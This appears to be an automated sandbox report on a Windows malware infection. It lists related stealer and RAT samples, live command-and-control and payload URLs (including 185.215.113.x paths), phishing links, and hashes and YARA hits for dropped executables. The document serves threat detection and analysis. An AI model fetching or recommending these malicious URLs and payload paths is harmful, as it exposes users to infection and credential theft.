	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse
	KMPrEVaSfH.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Get hash	malicious	Amadey, RedLine, RisePro Stealer	Browse
	New_Text_Document_mod.exse.exe	Get hash	malicious	AgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoader	Browse
	https://aeindo.co.id/cvt/	Get hash	malicious	Unknown	Browse
	https://kurindubaitullah.com/lpwx00	Get hash	malicious	Unknown	Browse
	doc0987654321u.exe	Get hash	malicious	Unknown	Browse
	starter.sh	Get hash	malicious	Unknown	Browse
185.215.113.19	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.19/CoreOPT/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.17156.10149.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.11211.15058.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.15994.16518.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.17122.16457.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.4650.358.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.20423.9863.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.8387.16538.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
185.215.113.16	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	PQ2AUndsdb.exe	Get hash	malicious	Amadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	surp.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16/inc/LummaC22222.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	185.215.113.16/inc/mobiletrans.exe
	file.exe	Get hash	malicious	Amadey, Cryptbot, Go Injector, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tmpfiles.org	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	mlk3kK6uLZ.exe	Get hash	malicious	Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar	Browse	104.21.21.16
	KMPrEVaSfH.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	104.21.21.16
	SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Get hash	malicious	Amadey, RedLine, RisePro Stealer	Browse	104.21.21.16
	New_Text_Document_mod.exse.exe	Get hash	malicious	AgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoader	Browse	104.21.21.16
	https://aeindo.co.id/cvt/	Get hash	malicious	Unknown	Browse	104.21.21.16
	https://pmb.stitmakrifatulilmi.ac.id/scv/	Get hash	malicious	HTMLPhisher	Browse	172.67.195.247
	https://central-lab.by/rstc/	Get hash	malicious	Unknown	Browse	172.67.195.247
ip-api.com	d3d9x.dll	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	adbce.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	dlmgr.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	REVISED PI.PDF.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
github.com	https://jwx.iountanic.com/4rGra/	Get hash	malicious	Unknown	Browse	140.82.121.4
	snhNDcl7l4.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	dwIGwWAccb.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	file.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	https://www.dropbox.com/scl/fi/op070xas0eh2p222upauu/Document-1.docx?rlkey=lrjcxds4fso3d5dmmlv1itair&st=c1fl3n2k&dl=0	Get hash	malicious	HTMLPhisher	Browse	140.82.121.3
	https://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	140.82.121.3
	https://alkimialofts.com/on%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	phish_alert_iocp_v1.4.48 (43).eml	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	https://fb1f1d-d3.myshopify.com/pages/fb1f1d-d3-scanning#0YnJhbmRpLnRyeW9uQGFjYWRlbWljcGFydG5lcnNoaXBzLmNvbQ0=	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	140.82.121.4
	https://www.linkedin.com/redir/redirect?url=https://assets-usa.mkt.dynamics.com/2143bba1-f463-ef11-a66d-6045bd003910/digitalassets/standaloneforms/3d28dcfa-8464-ef11-bfe2-0022480a9151&urlhash=OzMH&trk=article-ssr-frontend-pulse_little-text-block	Get hash	malicious	HTMLPhisher	Browse	140.82.121.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.17
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	wfJfUGeGT3.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
CLOUDFLARENETUS	https://redssainvoice309.s3.amazonaws.com/fidiverif654.html	Get hash	malicious	Phisher	Browse	188.114.96.3
	HDKuOe.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Launcher_x32_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	l5u4ezxr.u51.exe	Get hash	malicious	LummaC	Browse	104.21.69.149
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SecuriteInfo.com.Win64.MalwareX-gen.30136.14956.exe	Get hash	malicious	Unknown	Browse	172.65.154.135
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.17
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	wfJfUGeGT3.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	5.97238192300277
Encrypted:	false
SSDEEP:	1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
MD5:	DB5717FD494495EEA3C8F7D4AB29D6B0
SHA1:	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
SHA-256:	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
SHA-512:	B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 86%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(.....r...p. ......(.....rC..p.s.........s.........s.........s..........rg..p. g.h..r...p. r....r/..p. .....r...p. p{..r...p. ..?...((....r...p. ....r...p. S....(+...-.(,...,.+.(-...,.+.(...,.+.()...,..(Z..."(....+."(....+.&(9...&+..+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-..ra..p. .....r...p. .y4..r)..p. E/...r...p.r...p.rU..p.r...p. ..'..r...p.

C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	5.97238192300277
Encrypted:	false
SSDEEP:	1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
MD5:	DB5717FD494495EEA3C8F7D4AB29D6B0
SHA1:	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
SHA-256:	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
SHA-512:	B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 86%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(.....r...p. ......(.....rC..p.s.........s.........s.........s..........rg..p. g.h..r...p. r....r/..p. .....r...p. p{..r...p. ..?...((....r...p. ....r...p. S....(+...-.(,...,.+.(-...,.+.(...,.+.()...,..(Z..."(....+."(....+.&(9...&+..+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-..ra..p. .....r...p. .y4..r)..p. E/...r...p.r...p.rU..p.r...p. ..'..r...p.

C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	675840
Entropy (8bit):	7.998216130139266
Encrypted:	true
SSDEEP:	12288:nQZ3hb7F0Rz5oquPojKv3rLMmVIhF2nde4S9MQfh0/Al2B4KtFejEqhPBBl0:G8zOFPOKzLM0k4dQf2B1E4q5Bs
MD5:	8083FED730E151BF47528621DB8E7FF8
SHA1:	4AB5E2EB5C6326FD68704CDC5A4F719D332F51A6
SHA-256:	AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
SHA-512:	A36F22356558565A90107F3618D9D9AC8A20DA73616AA97A87D3EA41C8F444847A6BB56856FEAE87A1CA5C6CC748BF6CE1C43D5E348DD9EA80CDD3C3DBD0D47B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92% Antivirus: Virustotal, Detection: 82%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..H............... .....@..... ....................................`...@......@............... ..................................n............................................................................................ ..H............text....G... ...H.................. ..`.rsrc...n............J..............@..@........................................H.......d[..x...........................................................8.#G..d..P.6.>..(.....=#..U...Ri..D.......H.x..7.z.)V.?2..t..s....A]..4..rI0 P..h.s.u...;P......u...7....g....`........D..a..p.......nRa+5.ux.r....!6...}...{...A.6.9../W8..'...e...U\|.x+Tq...7+9G.t.....=...J....E[.._.....MX.....!@9..6.]..A.....t{."V.i...%..-.Ld$....q.....-..x.b.^}3:c_.D..k^....~.48A.u.R..dc.l....o.<. ...P.X...$H..vN.2...?y6.~Y."..3..............W.....CH'...;.... Ff......C.H.

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Reputation:	unknown
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.310827081195956
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr9:KooCEYhgYEL0In
MD5:	F2D67C1685BFF56EB7C25F3DE632E030
SHA1:	BBE8AF4431C85942AA7A2F570685F9E5FCEE0A8C
SHA-256:	AC36566147AB6F75DF9843BCBEFF0D1D66A106717ABF5A28DE4648C523B360CB
SHA-512:	B7E0FC5D7A3C895975D8858A404030EF483BA36E90E7C53EDC544947D55E3B5F4AA79DA02645E6F164129130FC7BDCA24DEA318B6959366A174F8685BB08ECA4
Malicious:	false
Reputation:	unknown
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xca4fcb68, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42219685563026804
Encrypted:	false
SSDEEP:	1536:/SB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:/azag03A2UrzJDO
MD5:	64B543A0E11DE1540FFF24907A66D518
SHA1:	772BCE6ECA108C54D530702C15B5922B5A72EE3A
SHA-256:	8B4A4334CFD1B30DFE2B66C0D99719F28A8FD73ED2CA54685453281D2E637441
SHA-512:	10BF2A08A0DC1CA39DE67041BACCBD54C88CE3F50FAC3F744E70EECF5903F5DE111B68B4E3B704E7B11880F85FC026B3E1647E3B71FF0E9FA6BA4730296773A6
Malicious:	false
Reputation:	unknown
Preview:	.O.h... .......Y.......X\...;...{......................n.%......-...\|..6)...\|..h.#......-...\|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................&...-...\|...................M...-...\|c..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07906307870326298
Encrypted:	false
SSDEEP:	3:q4tlOetYekwW7UXdxGBIIeOI8roXZwiIxTXallOE/tlnl+/rTc:q4XrzgUDRIen8ro9IxTepMP
MD5:	8B758B430AFC2BC22279EC909339E349
SHA1:	3C3D8BB40ACD3B77D47EEA634CDCBD2A7DBBBABB
SHA-256:	A26DDB98C7C615D56AB6719952B902C00441FA84A2535484F7CD971AC6182BB2
SHA-512:	2B924CAD21F5ABF5440A2DB3667E695358EFC75B647A792207737257B4C8D0DFC3FA0CBEEE70A0433C8DB031652E6F9D1C2FB413B531FA8B889F824AE84B0CDB
Malicious:	false
Reputation:	unknown
Preview:	B......................................;...{..6)...\|...-...\|c..........-...\|c..-...\|c.6'..-...\|c..................M...-...\|c.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	675840
Entropy (8bit):	7.998216130139266
Encrypted:	true
SSDEEP:	12288:nQZ3hb7F0Rz5oquPojKv3rLMmVIhF2nde4S9MQfh0/Al2B4KtFejEqhPBBl0:G8zOFPOKzLM0k4dQf2B1E4q5Bs
MD5:	8083FED730E151BF47528621DB8E7FF8
SHA1:	4AB5E2EB5C6326FD68704CDC5A4F719D332F51A6
SHA-256:	AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
SHA-512:	A36F22356558565A90107F3618D9D9AC8A20DA73616AA97A87D3EA41C8F444847A6BB56856FEAE87A1CA5C6CC748BF6CE1C43D5E348DD9EA80CDD3C3DBD0D47B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92% Antivirus: Virustotal, Detection: 82%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..H............... .....@..... ....................................`...@......@............... ..................................n............................................................................................ ..H............text....G... ...H.................. ..`.rsrc...n............J..............@..@........................................H.......d[..x...........................................................8.#G..d..P.6.>..(.....=#..U...Ri..D.......H.x..7.z.)V.?2..t..s....A]..4..rI0 P..h.s.u...;P......u...7....g....`........D..a..p.......nRa+5.ux.r....!6...}...{...A.6.9../W8..'...e...U\|.x+Tq...7+9G.t.....=...J....E[.._.....MX.....!@9..6.]..A.....t{."V.i...%..-.Ld$....q.....-..x.b.^}3:c_.D..k^....~.48A.u.R..dc.l....o.<. ...P.X...$H..vN.2...?y6.~Y."..3..............W.....CH'...;.... Ff......C.H.

C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	5.97238192300277
Encrypted:	false
SSDEEP:	1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
MD5:	DB5717FD494495EEA3C8F7D4AB29D6B0
SHA1:	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
SHA-256:	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
SHA-512:	B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 86%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(.....r...p. ......(.....rC..p.s.........s.........s.........s..........rg..p. g.h..r...p. r....r/..p. .....r...p. p{..r...p. ..?...((....r...p. ....r...p. S....(+...-.(,...,.+.(-...,.+.(...,.+.()...,..(Z..."(....+."(....+.&(9...&+..+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-..ra..p. .....r...p. .y4..r)..p. E/...r...p.r...p.rU..p.r...p. ..'..r...p.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52i.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000267001\52i.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.356471432431617
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
MD5:	E56A6A79CB531084A51F12C271BE7439
SHA1:	97A016CBE4C221936BAB8F76D33F7C021AA19ADF
SHA-256:	FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
SHA-512:	B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HM3SOlbpH71yEXUIEAOeIiGX.exe.log

Download File

Process:	C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	unknown
